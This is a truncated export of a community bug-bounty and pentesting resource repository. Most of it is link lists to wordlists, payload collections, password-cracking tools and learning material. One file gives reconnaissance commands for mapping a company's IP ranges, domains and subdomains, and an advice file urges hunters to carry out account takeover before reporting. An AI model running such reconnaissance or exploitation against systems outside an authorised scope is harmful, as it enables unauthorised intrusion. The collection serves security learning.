Showing preview only (873K chars total). Download the full file or copy to clipboard to get everything.
Repository: RESETHACKER-COMMUNITY/Pentesting-Bugbounty
Branch: main
Commit: 59cac7d23fab
Files: 94
Total size: 831.1 KB
Directory structure:
gitextract_93rjh7w1/
├── .github/
│ └── FUNDING.yml
├── .pdfs/
│ ├── INDEX
│ ├── PT-V1.1.xmind
│ └── web app penetration testing list.xlsx
├── API-HelpDesk/
│ └── Readme.md
├── Bugbounty/
│ ├── BB-FAQ/
│ │ ├── BB_FAQ.md
│ │ ├── Domain-Information.md
│ │ └── Readme.md
│ ├── BBMindmap/
│ │ └── Readme.md
│ ├── Readme.md
│ ├── Table_of_Vulnerability.md
│ ├── Website_inputs_testing.md
│ ├── Wordlists/
│ │ ├── AllWordlists.md
│ │ └── Readme.md
│ ├── Wordlists.md
│ ├── bugbounty-FAQ.md
│ └── burpsuite.md
├── Burpsuite/
│ ├── Assets/
│ │ └── Readme.md
│ ├── Readme.md
│ └── protips.md
├── CONTRIBUTING.md
├── Contributors.md
├── CyberSecurityJobs/
│ ├── Careers
│ ├── CoverLetter.md
│ ├── CybersecuityDiscipline.md
│ ├── For_Jobs.md
│ ├── Intership_Advice.md
│ ├── InterviewQA.md
│ ├── Jobs.md
│ ├── Readme.md
│ ├── SalaryNegotiation.md
│ ├── internships.md
│ └── resume.md
├── ISO-HelpDesk/
│ └── Readme.md
├── LFI/
│ ├── Lfi.md
│ ├── Lfitools.md
│ └── Readme.md
├── Pentesting Cheatsheets/
│ ├── Readme.md
│ └── cheetsheets.md
├── Pentesting-BugbountyINDEX.md
├── PentestingChecklist/
│ └── Readme.md
├── PentestingReports/
│ ├── PreEngagement.md
│ ├── Readme.md
│ └── pentestingvideos.md
├── Pentesting_for_Researchers/
│ ├── PTplatform.md
│ ├── Pentest-Reports.md
│ └── Readme.md
├── README.md
├── ResetCybersecuirty/
│ ├── CONTRIBUTING.md
│ ├── CVE's/
│ │ ├── CVE_Assests/
│ │ │ ├── Beta.md
│ │ │ └── Readme.md
│ │ ├── POC_collecctions.md
│ │ └── Readme.md
│ ├── Readme.md
│ ├── SupportedBy/
│ │ ├── CommunityEngagementPartners.md
│ │ ├── SponserUs.md
│ │ ├── Suggestions.md
│ │ ├── Team&Contributors.md
│ │ └── Understanding.md
│ ├── WIUAsset/
│ │ ├── Contribute.md
│ │ ├── Logs.md
│ │ ├── Readme.md
│ │ ├── WIU_Templete/
│ │ │ ├── WIU_Trail_Beginners.md
│ │ │ ├── WIU_Trail_For_Professionals.md
│ │ │ ├── WIU_v0.3.md
│ │ │ ├── WIU_v0.4.md
│ │ │ └── helpdesk-Github.md
│ │ └── Weekly_Infosec_Update_Segment/
│ │ ├── Course_Review/
│ │ │ ├── CEH.md
│ │ │ └── Readme.md
│ │ ├── Future_updates.md
│ │ ├── Readme.md
│ │ └── Tools/
│ │ └── Readme.md
│ ├── Weekly_Infosec_Update(WIU)/
│ │ ├── Weekly_Infosec_Update_00.md
│ │ ├── Weekly_Infosec_Update_01.md
│ │ ├── Weekly_Infosec_Update_02.md
│ │ ├── Weekly_Infosec_Update_03.md
│ │ ├── Weekly_Infosec_Update_04.md
│ │ ├── Weekly_Infosec_Update_05.md
│ │ ├── Weekly_Infosec_Update_06.md
│ │ ├── Weekly_Infosec_Update_07.md
│ │ ├── Weekly_Infosec_Update_08.md
│ │ ├── Weekly_Infosec_Update_09.md
│ │ ├── Weekly_Infosec_Update_10.md
│ │ ├── Weekly_Infosec_Update_11.md
│ │ └── Weekly_Infosec_Update_12.md
│ └── code-of-conduct.md
├── Sqlinjection.md
├── cheetsheets/
│ ├── BurpSuiteCheetsheet.md
│ ├── Nano.md
│ ├── Readme.md
│ ├── metasploitcheetsheet.md
│ └── nmapcheetsheet.md
├── enterprises.md
└── license
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/FUNDING.yml
================================================
# These are supported funding model platforms
custom: https://paypal.me/Vicky481
================================================
FILE: .pdfs/INDEX
================================================
** ** [Resources Mindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)
/Resources/blob/main/Writeups/Create.md
RESOURCES:(Readme.md)
1. Conferences > Readme.md (Conferences around the world)
2. Setup > Readme.md (SetupHelpDesk(Under Development))
3. Writeups > Readme.md (/BugBounty Basic -BBb_00, BugBounty Let's Hunt - BBh_01 & Bugbounty Hunters - BB_Hunter)
BBbasics.md
BBIntermidiate.md
BBHunter.md
CmsServerDatabase.md
Create.md
javascript.md
4. Bugbountycheetsheet > Readme.md
bugbountyplatform.md
5. Bugbounty > Readme.md
> 0AuthMisconfiguration.md
XSS
1 XSS Documentation
2 XSS Practice labs
3 XSS Disclosure/Reports/POC
4 XSS Mindmap
5 XSS Tools
6 XSS Ebooks
7 XSS Researchers
8 XSS CVE
SSO
1 SSO Documentation
2 SSO Practice labs
3 SSO Disclosure/Reports/POC
4 SSO Mindmap
5 SSO Tools
6 SSO Ebooks
7 SSO Researchers
8 SSO CVE
6. BB_Setup in WSL2 > README.md
> BB_Setup.sh
> WSL2.md
7. Getting_Started_with_Cybersecurity
8. Ebooks.md
9. ResoursesMindmap.md
================================================
FILE: API-HelpDesk/Readme.md
================================================
# Here's 23 free ways to learn about API security testing: by Hany Soliman
1. Video: Traceable AI, API Hacking 101.
2. Video: Katie Paxton-Fear, API Hacking.
3. Video: Bugcrowd, Bad API, hAPI Hackers.
4. Video: OWASP API Security Top 10 Webinar.
5. Blog: Detectify, How To Hack API's in 2021.
6. Blog: HackXpert, Let's build an API to hack.
7. Video: Bugcrowd, API Security 101 by Sadako.
8. Video: David Bombal, Free API Hacking Course.
9. Blog: Wallarm, How To Hack API In 60 Minutes.
10. Website: APIsecurity IO, API Security Articles.
11. Blog: Curity, The API Security Maturity Model.
12. Blog: Expedited Security, API Security MegaGuide.
13. Video: Grant Ongers, API Security Testing Workshop.
14. Videos: The XSS Rat, API Testing And Securing Guide.
15. Blog: APIsec OWASP API Security Top 10: A Deep Dive.
16. Podcast: We Hack Purple, API Security Best Practices.
17. Blog: Kontra Application Security, Owasp Top 10 for API.
18. Blog: Secure Delivery, OWASP API Top 10 CTF Walk-through.
19. Blog: SmartBear, How To Hack An API And Get Away With It
20. Blog: Ping Identity, API Security: The Complete Guide 2022.
21. Video: SANS Offensive Operations, Analyzing OWASP API Security.
22. Blog: Bend Theory, Exploiting Unintended Functionality in API's.
23. Blog: Bright Security, Complete Guide to Threats, Methods & Tools.
- https://github.com/shieldfy/API-Security-Checklist
================================================
FILE: Bugbounty/BB-FAQ/BB_FAQ.md
================================================
# BUG BOUNTY FAQ - freqently asked questions (Beginners friendly - Under Development)
Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.
BugBounty FAQ | Title
-- | --
**0** Getting Started in Cybersecurity Advice | [Be-a-hacker and breaking cybersecurity successfully](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Getting_Started_with_Cybersecurity.md)
**0** Bugbounty FAQ - Imran parray | [General questions asked by poeple](https://github.com/imran-parray/General-Notes)
**0** Bugbounty Setup HelpDesk | [Got stuck During Setup We have solution for you](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)
**0** Job/Internship/Resume HelpDesk | [find Cybersecurity Jobs/interview, advice to get jobs, crack interview etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)
**0** Stay upto date with conferances | [Track all the upcoming conferances](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)
**0** Trace latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community | [Resources to keep up with cybersecurity community](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)
**0** Build with community | [Create, Build and Automate for personal use ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/Create.md)
================================================
FILE: Bugbounty/BB-FAQ/Domain-Information.md
================================================
## Domain Information :
- Find Acquisition(google 6 month rule), ASNS, reversewhois, (Identifying IPs and main TLDS)
Example: List_of_mergers_and_acquisitions_by_COMPANYNAME
https://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Alphabet
https://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Meta_Platforms
- Search eg :
responsible disclosure 2022
Company responsible disclosure
Or check out the suggested keywords by bug hunters or search engines.
- Go to bug bounty platform and filter our new listed programs manually.
- 3rd party webisite can be helpfull as well such as cruchbase etc.
- To check ASN of IP of domains Visit : ASN Number eg : AS714
https://bgp.he.net or ASN Tool - MxToolBox
- An Autonomous System Number (ASN) is a way to represent a collection of IPs and who owns them.
- The IP address pool is spread across five Regional Internet Registries (RIRs) AFRINIC, APNIC, ARIN, LACNIC, and RIPE NCC.
- The providers then allocate IP ranges to different organizations.
- If a company wishes to buy a block of IP addresses, they must purchase it from one of these providers.
- To check CIDR range : eg 31.13.55.0/24
- A Classless Inter-Domain Routing (CIDR) range is a short way of representing a group of IP addresses.
- Compromising a server hosted on a company’s CIDR range may lead you directly into their internal network.
- Use (https://mxtoolbox.com/asn.aspx) to find a company’s ASN as well as their correlating CIDR ranges. Note that small organizations won’t have a dedicated CIDR range, they normally use third party cloud vendors such as AWS and Rackspace, or they will host their stuff under an internet service provider (ISP) IP. However, large companies tend to have their own CIDR range and we can use this information to target machines hosted there.
- Amass Tool : To find domains on a given CIDR range.
Amss intel -cidr 31.13.55.0/24
- Reverse Whois : To find assets owned by an organization or person.
- There are several online sources that constantly monitor and scrape the whois database for analysis. We can use these services to find domains that are owned by the same organization.
Reverse Whois Lookup - ViewDNS.info
- WHOIS : (Domain owners from ASN number)
- Searching the whois database we can find all domains registered by the email “*.example.com”. Some people will use whois guard to hide this information but many companies forget to enable this.
whois -h whois.radb.net -- '-i origin AS714' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq
OR
whois -h whois.radb.net -- '-i origin ' | grep -Eo "([0- 9.]+){4}/[0-9]+" | sort -u
Try command: host example.com or dig example.com or ping exaple.com (to know the IP address)
- DNS Information
- Without the Domain Name System (DNS) you wouldn't be able to correlate domains to Ips.
- DNS records contain several bits of information that can be used to correlate domains to one another.
- The A, NS, and MX records are the most popular ways to find domains that are likely to be owned by the same person.
- Try command: dig example.com (give you CNAME - Use to check the subdomain takeover with help of https://github.com/EdOverflow/can-i-take-over-xyz )
We can also see that the domain points to the CNAME page “anything.organization.com”, if we can register this domain we win.
- NOTE that organization could be GitHub, Cloudflare, aws etc.
- Reverse DNS:
- If domains share the same A, NS, or MX record then it is possible they are owned by the same person.
- We can use reverse IP, reverse name server, and reverse mail server searches to find these domains.
- There may be some false positives but these can be filtered out.
- This technique will greatly increase your scope has a bug bounty hunter.
- Name server:
- Large companies often host their own name servers so they can route traffic to the correct IPs.
- These servers are configured by the organization who owns them so it stands to say that
- Microsoft wouldn’t have domains pointing to a Facebook name server.
Nslookup -type=NS example.com
- Reverse Name server:
There are hundreds of thousands of domains pointing to GoDaddy nameservers,
To check how many domains pointing to nameservers.
● https://domaineye.com
but you may have a few false positives in there.
- Reverse Mail Server:
MX record returned must be owned by the target organization.
To perform reverse mail server search
● https://domaineye.com
Nslookup -type=MX example.com
- Reverse IP
- Utilizing the companies CIDR ranges we can perform a reverse IP search to find any
domains that are hosted on those IPs. Some people will also use the A record of
their target domain to perform reverse IP search. Again, you can use
https://domaineye.com/
---
What we have learned till now:
## Finding Acquisition and Idea is find more Ip/domains related to target.
Get IP : ping xyz.com or dig xyz or host xyz.com
Check ASN
check CIDR range :
WHOIS : (Domain owners by same organizations or company)
Reverse Whois
DNS Information
Reverse DNS
Reverse Name server
Reverse Mail server
Reverse IP
Favicon hashing
- Note:
1. Get ASN from IP > Get CIDR range and save it to IP.TXT
2. whois -h whois.radb.net -- '-i origin AS714' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq | IP.TXT
Run Nmap nmap -iL IP.TXT
2. Collect subdomains and check CNAME of all the subdomains with single cammand.
### Tool recommended : Amass for asset discovery
- Amass to find ASM
Amass intel -org example.com
- Amass to list of domains running on given ASN
Amass intel -asn AS714
- To find domains on a given CIDR range.
Amass intel -cidr 31.13.55.0/24
- Utilize reverse whois searches to find other domains purchased by the same user
amass intel -whois -d example.com
================================================
FILE: Bugbounty/BB-FAQ/Readme.md
================================================
##### For every bug bounty hunter, keep these things in mind when you are reporting any vulnerability
- 1-Report should have all the necessary details including vulnerable url(most imp), reproducing steps ,poc, impact and if possible mitigation steps.
- 2-When you are explaining impact of any vulnerability , don’t just tell them i can steal session cookie and do account takeover, try to do it and the- n report it. Reporting anything and asking for bounty or hall of fame is not worth it at all.
- 3-This is for xss guys, after finding a popup dont report, try to do further exploitation and increase your impact.
- 4-Report multiple vulnerabilities to a company and then approach them to get their vapt done by you , it will help you in future.
- 5-Understand what’s critical for a company and focus on that types of bugs when you are hunting and trust me it will save your time for sure and you won’t get demotivated after seeing traiger reply on your bug that they are not applicable or etc etc.
================================================
FILE: Bugbounty/BBMindmap/Readme.md
================================================
## This folder contails mutiple Bugbounty Mindmap curated by all the amazing bughunters.
Use it as inspiration for creating your own Web pentest / bug bounty recon and Hunting workflow.
- [How Does Mind Mapping Help for Better Bug Bounty](https://www.xmind.net/blog/en/how-does-mind-mapping-help-for-better-bug-bounty/)
- [*Compilation of recon workflows by pentester land](https://pentester.land/cheatsheets/2019/03/25/compilation-of-recon-workflows.html)
- [*Bubounty-hunter - Collect of Mindmap for Bugbounty](https://gowthams.gitbook.io/bughunter-handbook/mindmaps)
- [Collect of Mind-Maps of Several Things - forked from Imram-parray](https://github.com/RESETHACKER-COMMUNITY/Mind-Maps))
- [Dsopas - BB approc ](https://github.com/dsopas/assessment-mindset)
- [Iamfrogy - BB approch](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)
- [ITSecurityguard - BB approch](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)
- [Ahmad Halabi - BB approch](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)
- [AjitYadav - web hacking & BB](https://ajityadav.net/assets/images/WH-Recon-BBB-Chapter5-Full.png)
- [Rohit gautam- BB Tools for Vulnerability](https://drive.google.com/drive/folders/15jbRQHhFPjx8oUbP1nPCtm2L-vB11Zew?usp=sharing)
================================================
FILE: Bugbounty/Readme.md
================================================
# Bug Bounty Helpdesk(Under Development)
> Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.
BugBounty HelpDesk | Title
-- | --
**0** Bug bounty FAQ | [Friendly Q/A](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)
**0** ResetHacker- Setup HelpDesk | [Pentesting/Bug Bounty/DevSecOps Setups in window, linux, docker and vps(aws, azure,gcp etc)](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)
**0** Ignitetechnologies & ResetHacker | [Burp Suite for Pentester and cheatsheet to hunt the vulnerabilities](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/burpsuite.md)
**0** Harsh-Bothra | [Learn 365 Challenge for Beginners/Intermidate - Take it as a refererance to Challenge yourself](https://github.com/harsh-bothra/learn365)
**0** hakluke | [Bug-bounty-standards - A list of edge cases that occur in bug bounty programs, conversations on how they should be handled.](https://github.com/hakluke/bug-bounty-standards)
**0** Cipher387 | [Dork Collection for different search engine:](https://github.com/cipher387/Dorks-collections-list)
**0** Luke Stephens | [How to Regex: A Practical Guide to Regular Expressions (Regex) for Hackers](https://www.bugcrowd.com/blog/how-to-regex-a-practical-guide-to-regular-expressions-regex-for-hackers/)
**0** Streaak | [Got an API use Keyhacks](https://github.com/streaak/keyhacks)
**0** Vikram | [JavaScript - Content discovery](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/javascript.md)
**0** Wordlists | [All Wordlists at one place](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/Wordlists/AllWordlists.md)
**0** Bug bounty writeups | [Vulnerability based write ups at one place](https://github.com/alexbieber/Bug_Bounty_writeups)
**0** Bug Bounty Mind-Map collection | [Bugbounty Mindmap curated by all the amazing bughunters.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty/BBMindmap)
**0** Public Bug bounty | [Collection of public Bugbounty program](https://github.com/resethacker/public-bugbounty-programs)
**0** StayUpToDate | [Latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community.](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)
BugBounty HelpDesk | Title
-- | --
**1** HackTricks | [Pentesting & bugbounty Methodology](https://book.hacktricks.xyz/pentesting-methodology)
**2** Six2dez | [Web-checklist](https://six2dez.gitbook.io/pentest-book/others/web-checklist)
**3** gowthams | [Help bug bounty hunters with resources](https://gowthams.gitbook.io/bughunter-handbook/bugbounty-short-write-ups)
**4** The Web Application Security Consortium | [The WASC Threat Classification v2.0](http://projects.webappsec.org/w/page/13246978/Threat-Classification)
**5** kathan19 | [HowToHunt](https://kathan19.gitbook.io/howtohunt/)
**6** Ninad Mathpati | [Securityboat](https://workbook.securityboat.in/)
**7** Book of Bug Bounty Tips | [Collection of "BugBounty" Tips tweeted / shared by community people.](https://gowsundar.gitbook.io/book-of-bugbounty-tips/)
**8** EdOverflow | [Cheatsheets and Must checkout for subdomains Takeover](https://github.com/EdOverflow/bugbounty-cheatsheet)
**9** Harsh-Bothra | [Security Explained - Highly recommend to understabd vulnerable code-** files](https://github.com/harsh-bothra/SecurityExplained/tree/main/resources)
**10** Security protection | [Curated lists of tools, tips and resources for protecting digital security and privacy](https://security-list.js.org/#/)
**11** Offensive Security Cheetsheet | [Web Pentesting and bug bounty](https://cheatsheet.haax.fr/web-pentest/bug_bounty_tips/)
**12** @zapstiko | [curate bogbounty resource from twitter](https://github.com/zapstiko/Bug-Bounty)
**13** AllVideoPocsFromHackerOne | [TOP 20 Weakness from HackerOne disclosed Reports](https://github.com/zeroc00I/AllVideoPocsFromHackerOne)
## Getting started with BugBounty - Under development
1. | [Resources for getting started with BugBounty -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md)
2. | [Resources for Web Pentesting: Let's Hunt - BBh_01 - under development ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md)
This contains the detailed resources for people getting started with BugBounty.
Index | [BugBounty Basic -BBb_00 ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBbasics.md)
--- | ---
**1** | Linux Distributions
**2** | Basic Understanding the web application before you start Hunting
**3** | Learning resources
**4** | Paid Certifications / courses
**5** | Bug Bounty platforms offers Bounty
**6** | Practice platform
**7** | [Talks - Bug Bounty]
**8** | [Pentesting & Bug Hunting Resources - How to Start?]
**9** | [Bug reports]
**10** | [Vulnerabilt] Assesment and one liners]
**11** | [Bug hunting Reconnaissance writeups]
**12** | [Tools for bug bounty]
**13** | [Ebooks]
**14** | [Misc]
This contains the detailed Resources for people
**Already Doing BugBounty**
Index | [Web pentesting : Let's Hunt - BBh_01 - Under development](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/BBintermediate.md)
--- | ---
**1** | [Pentesting Reports/Disclosures ]
**2** | [Web Pentesting MindMaps]
**3** | [Web security Testing Writeups]
**4** | [Bugbounty Reports/Disclosures ]
**5** | [Bugbounty Methodology/Reconnaissance]
================================================
FILE: Bugbounty/Table_of_Vulnerability.md
================================================
**Writeups** : Vulnerability cheetsheets
This file contains the detailed write up on cheetsheets, Reports, Disclosure, etc - Updating Soon
## Referance :
- [imran-parray](https://github.com/imran-parray/Web-Sec-CheatSheet)
# Table of Vulnerability
Index | [BugBounty Let's Hunt - BBh_01 ](/Writeups/BBintermediate.md)
--- | ---
**1** | [XSS](/XXS/Readme.md)
**2** | [SQL injection](Sqlinjection.md)
**3** | [LFI](LFI/Readme.md)
**4** | [Business logic Attacks by Dheerajmadhukar](https://github.com/Dheerajmadhukar/notes/tree/main/BugBounty/Business_Logic_Attacks)
**x** | [Captcha Bypass]()
**x** | [Clickjacking]()
**x** | [Client Side Template Injection - CSTI]()
**x** | [Command Injection]()
**x** | [Content Security Policy - CSP Bypass]()
**x** | [Cookies Hacking]()
**x** | [CORS - Misconfigurations & Bypass]()
**x** | [CRLF Injection]()
**x** | [CSRF (Cross Site Request Forgery]()
**x** | [Dangling Markup - HTML scriptless injection]()
**x** | [Deserialization]()
**x** | [Email Header Injection]()
**x** | [File Inclusion]()
**x** | [File Upload]()
**x** | [IDOR]()
**x** | [JWT Vulnerabilities]()
**x** | [LDAP Injection]()
**x** | [NoSQL Injection]()
**x** | [Open Redirect]()
**x** | [Race Condition]()
**x** | [SSRF (Server Side Request Forgery]()
**x** | [SSTI (Server Side Template Injection]()
**x** | [Unicode Normalization vulnerability]()
**x** | [XPATH Injection]()
**x** | [XSLT Server Side Injection]()
**x** | [XXE (XML External Entity]()
** ** | [oauth Misconfigration and bypass]()
** ** | [2FA Misconfigration & bypass]()
** ** | [MFA Misconfigration & bypass]()
** ** | [Broken link hijacking Misconfigration & bypass]()
** ** | [Subdomain Takeover(mainly CNAME) Misconfigration & bypass]()
//Index | [Bugbounty Hunters - BB_Hunter](/Writeups/BBHunter.md)
--- | ---
Index | [BugBounty Basic -BBb_00 ](/Writeups/BBbasics.md)
--- | ---//
Index | Getting started with Bug bounty & web pentesting
---|---
**0** Pentesterlabs | [Web pentesting part 1](https://pentesterlab.com/exercises/web_for_pentester/course)
**0** Pentesterlabs | [Web pentesting part 2](https://pentesterlab.com/exercises/web_for_pentester_ii/course)
**1** Sanjib Sinha | [Bug Bounty Hunting for Web Security with OWASP Webgoat](https://github.com/Apress/bug-hunting-web-security)
================================================
FILE: Bugbounty/Website_inputs_testing.md
================================================
Index | Topics
---|---
**1** Bozhidar Bozhanov | [User Authentication Best Practices Checklist](https://dzone.com/articles/user-authentication-best-practices-checklist)
**2** Gaurav Bewal | [Registration & Login Page Testing for Develpoers/Pentesters](https://www.loginradius.com/blog/async/test-cases-for-registration-and-login-page/)
================================================
FILE: Bugbounty/Wordlists/AllWordlists.md
================================================
# Top Recommended wordlists available for red pentesting, bugbounty and password bruteforcing❤️😳
#### Perpose : This repository is the collection of multiple types of collected wordlists in one place by respective author and organization that could be used during security assessments and Use it to curate your own wordlist as per as your requirement.
List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, infrastructure,
high quality wordlists for content and subdomain discovery, payloads to exploit vulnerabilty and many more.
Wordlists 1
Payloads and Burpsuite wordlists
Wordlists 2
Password Bruteforce wordlists
Resources - Video, writeups, tools and referance for wordlists
Author | Wordlists 1
-- | --
▫️ | [SecLists - danielmiessler](https://github.com/danielmiessler/SecLists) - Collection of multiple types of lists.
▫️ | [Continuously Updated wordlists for Assets - Assetnote](https://wordlists.assetnote.io/) - High quality wordlists for content and subdomain discovery.
▫️ | [Fuzzdb - fuzzdb-project](http://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
▫️ | [OneListForAll - six2dez](https://github.com/six2dez/OneListForAll) - Rockyou for web fuzzing
▫️ | [Bug-Bounty-Wordlists - Karanxa](https://github.com/Karanxa/Bug-Bounty-Wordlists) - All the important wordlists used while bug hunting.
▫️ | [Webapp-wordlists - p0dalirius](https://github.com/p0dalirius/webapp-wordlists) - wordlists for each versions of common web applications and content management systems (CMS).
▫️ | [random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) - Some files for bruteforcing certain things include services, server, database etc
Author | Payloads and Burpsuite wordlists
-- | --
PayloadsAllTheThings - swisskyrepo | [A list of useful payloads and bypass for Web Application Security and Pentest/CTF](https://github.com/swisskyrepo/PayloadsAllTheThings)
Orwagodfather | [Payloads to exploit web vulnerabilty and different services. ](https://github.com/orwagodfather/WordList)
Fuzz.txt - Bo0oM | [Potentially dangerous files](https://github.com/Bo0oM/fuzz.txt)
IntruderPayloads - 1N3 | [A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.](https://github.com/1N3/IntruderPayloads)
Scavenger - wordlist from #burp history | [ Burp extension to create target specific and tailored wordlist from #burp history.](https://github.com/0xDexter0us/Scavenger)
Author | Wordlists 2
-- | --
Wordsmith - skahwah | [Assist with creating tailored wordlists. This is mostly based on geolocation.](https://github.com/skahwah/wordsmith)
Betterdefaultpasslist - govolution | [Default password Fuzz for ports and database.](https://github.com/govolution/betterdefaultpasslist)
Pydictor - LandGrey | [A powerful and useful hacker dictionary builder for a brute-force attack.](https://github.com/LandGrey/pydictor)
Mentalist - sc0tfree | [A graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.](https://github.com/sc0tfree/mentalist)
Basubanakar | [login-panel wordlists ](https://github.com/basubanakar/login-panel-wordlist)
Skweez | [Spiders web pages and extracts words for #wordlist generation.](https://github.com/edermi/skweez)
Author | Password Bruteforce wordlists
-- | --
**1** Hashmob | [Largest collection of Password hashes discovered in database breaches(or other sources)](https://hashmob.net/)
**2** passphrase-wordlist - initstring | [Passphrase wordlist and hashcat rules for offline cracking of long, complex passwords](https://github.com/initstring/passphrase-wordlist)
**3** Password-Scripts - laconicwolf | [A collection of scripts that help with different aspects of password cracking, such as wordlist generation, mask analysis, and positional character frequency.](https://github.com/laconicwolf/Password-Scripts)
**4** Pwdb-Public - FlameOfIgnis | [A collection of all the data extracted from 1 billion leaked credentials from internet.](https://github.com/FlameOfIgnis/Pwdb-Public)
**5** Probable-Wordlists - berzerk0 | [Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren't popular!](https://github.com/berzerk0/Probable-Wordlists)
**6** Brutas-Wordlists and passwords handcrafted with ♥️| [A pretty comprehensive set of password dictionaries and wordlists designed for quick wins in red teaming scenarios or general blackbox pentesting.](https://github.com/tasooshi/brutas)
**7** COOK | [An overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need.](https://github.com/giteshnxtlvl/cook)
**8** Passphrase-wordlist | [People think they are getting smarter by using passphrases. Let's prove them wrong!This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1,000 permutations of each phase](https://github.com/initstring/passphrase-wordlist)
**9** Insidetrust | [Wordlists for creating statistically likely usernames for use in username-enumeration, simulated password-attacks and other security testing tasks.](https://github.com/insidetrust/statistically-likely-usernames)
Index | Resources - Video, writeups, tools and referance for wordlists
-- | --
**0** Creating Wordlists for Hacking, Pentesting & Bug Bounty Hunting | [Using Seclists, Bigquery, and More!](https://www.youtube.com/watch?v=QGbTaxtEQlg)
**1** Utkusen writeup | [generating-personalized-wordlists - utkusen](https://utkusen.com/blog/generating-personalized-wordlists)
**2** Gotator - Josue87 | [A tool generate DNS wordlists through permutations.](https://github.com/Josue87/gotator)
**3** CWFF - D4Vinci | [A Tool to Create your Custom Wordlist For Fuzzing](https://github.com/D4Vinci/CWFF)
**4** Python Code | [CTH wordlists : passwords/keyboard - sorokinpf](https://github.com/sorokinpf/cth_wordlists/tree/master/passwords/keyboard)
Index | More Referance for wordlists
-- | --
**0** Wordlists for evrything | [Infosec Wordlists](https://github.com/xajkep/wordlists)
**0** Awesome-wordlists - gmelodie - | [Another curated list wordlists for bruteforcing and fuzzing](https://github.com/gmelodie/awesome-wordlists)
================================================
FILE: Bugbounty/Wordlists/Readme.md
================================================
TODO :
1. Create a wordlist based on Backend technology and add a Readme.md to summurize that Technology.
2. And Create a Common wordlist of Default pages for different Technology.
Eg : cgi-sys/defaultwebpage.cgi
================================================
FILE: Bugbounty/Wordlists.md
================================================
# Bruteforce Wordlists
Index | wordlists
-- | --
▫️ | [SecLists](https://github.com/danielmiessler/SecLists)
▫️ | [Fuzzdb](http://github.com/fuzzdb-project/fuzzdb)
▫️ | [betterdefaultpasslist](https://github.com/govolution/betterdefaultpasslist)
▫️ | [statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
▫️ | [pydictor](https://github.com/LandGrey/pydictor)
▫️ | [mentalist](https://github.com/sc0tfree/mentalist)
▫️ | [wordsmith](https://github.com/skahwah/wordsmith)
▫️ | [IntruderPayloads](https://github.com/1N3/IntruderPayloads)
▫️ | [fuzz.txt](https://github.com/Bo0oM/fuzz.txt)
▫️ | [Password-Scripts](https://github.com/laconicwolf/Password-Scripts)
▫️ | [Pwdb-Public](https://github.com/FlameOfIgnis/Pwdb-Public)
▫️ | [Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists)
▫️ | [WordList](https://github.com/orwagodfather/WordList)
▫️ | [Assetnote](https://wordlists.assetnote.io/)
▫️ | [Webapp-wordlists](https://github.com/p0dalirius/webapp-wordlists)
▫️ | [OneListForAll](https://github.com/six2dez/OneListForAll)
▫️ | [generating-personalized-wordlists](https://utkusen.com/blog/generating-personalized-wordlists)
▫️ | [gotator](https://github.com/Josue87/gotator)
▫️ | [CWFF](https://github.com/D4Vinci/CWFF)
▫️ | [passwords/keyboard](https://github.com/sorokinpf/cth_wordlists/tree/master/passwords/keyboard)
▫️ | [random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
▫️ | [passphrase-wordlist](https://github.com/initstring/passphrase-wordlist)
▫️ | [Probable-Wordlists](https://github.com/berzerk0/Probable-Wordlists)
▫️ | [awesome-wordlists](https://github.com/gmelodie/awesome-wordlists)
